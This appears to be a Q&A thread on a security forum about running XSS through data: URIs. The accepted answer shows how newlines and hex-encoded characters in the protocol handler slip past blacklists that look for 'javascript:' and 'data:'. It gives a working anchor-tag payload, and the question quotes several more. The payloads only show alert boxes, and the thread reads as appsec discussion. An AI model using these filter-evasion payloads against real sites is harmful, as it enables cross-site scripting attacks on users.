# data:// uri XSS - using wrappers

Tags: web-application, xss, javascript, appsec, attack-vector

Is there any way to load html data uri:

> data:text/html,<html><svg/onload=confirm(1)></html>

with this scheme:

> data://

i have seen this payload going around:

> data://text/javascript,alert(1)

But only shows as text plain, on latest Chrome / Firefox

Mozzila Firefox ESR latest -> prompts download

Answer (score 4, accepted):

**Doing this directly in the searchbar won't work, it must to be activated from the source code.**

By introducing a newline right in the middle of the protocol handler, we can make sure that blacklists looking for *javascript:* and *data:* as well as other possibly malicious handlers will not detect anything bad, and probably will allow submission. The only browsers not allowing this kind of obfuscation are Firefox and Gecko-based user agents. Since it's allowed to use the canonical form of the newline.

Practically you can manipulate the handler by using hex-chars to replace with some chars in the current payload.

The "a" in this payload is actually hardcoded in hex, between "d" and "t", then using the content type text/html for displaying it, also the a's next are in hex:

```
<a href="
        d
        &#x61
        t
        &#x61
        :text/html,
        <scr&#x69pt>alert('Gstuff')</scr&#x69pt>">click me</a>
```

The code above will result in a valid XSS, tested in Safari 12.11

https://i.stack.imgur.com/aPJox.png

Comment: Thanks, learned something new! :-)
Well unfortunately for me, I can only use foobar:// uri scheme expect javascript word, and was thinking I can do this with data://, I just looked and you are right.
https://www.php.net/manual/en/wrappers.data.php